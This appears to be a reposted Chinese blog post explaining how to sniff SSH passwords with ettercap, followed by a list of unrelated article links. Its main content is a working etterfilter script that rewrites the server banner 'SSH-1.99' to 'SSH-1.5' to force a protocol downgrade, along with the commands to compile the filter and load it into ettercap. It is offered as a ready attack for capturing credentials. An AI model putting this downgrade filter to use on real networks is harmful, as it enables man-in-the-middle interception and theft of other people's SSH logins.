博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
使用ettercap嗅探ssh口令
阅读量:2435 次
发布时间:2019-05-10

本文共 418 字,大约阅读时间需要 1 分钟。

* 作者: xi4oyu(http://www..com)

* 转载请注明出处

通常情况下我们判断目标的ssh能否被嗅探可以使用nc来确定。具体方法为nc targetip 22。

如果返回的版本号为SSH-1.99就表示在sshd_config中protcol 为2,1。

但默认从网上下的ettercap是不能嗅探ssh1的密码的,即使被嗅探的服务器被配置成了protcol 2,1也一样。

花了一会研究了下filter的写法,写了个ssh将ssh-1.99降到ssh-1.5的filter

if (tcp.src ==22 && search(DATA.data,"SSH-1.99")){

replace("SSH-1.99","SSH-1.5");

}

保存为sh.filter,编译方式为Etterfilter sh.filter -o sh.ef

启动ettercap的时候加载这个filter,看看,是不是能嗅了?

呵呵

你可能感兴趣的文章
多线程——背景了解
查看>>
power designer使Comment与Name相同.txt
查看>>
学习Spring 开发指南------基础语义
查看>>
IE下的图片空隙间距BUG和解决办法
查看>>
[pb]从excel导入数据到datawindow
查看>>
CSS Padding in Outlook 2007 and 2010
查看>>
有关内存的思考题
查看>>
What is the difference between gross sales and revenue?
查看>>
Dreamweaver默认打开后缀名为ftl的文件时
查看>>
LNMP一键安装
查看>>
几个分析函数的比较
查看>>
主流算法:
查看>>
RMI
查看>>
J.U.C之Future
查看>>
缓存思想分析
查看>>
一致性hash
查看>>
J.U.C之ConcurrentHashMap分析
查看>>
J.U.C之CopyOnWriteArrayList
查看>>
J.U.C之Atomic&CAS
查看>>
类的生命周期
查看>>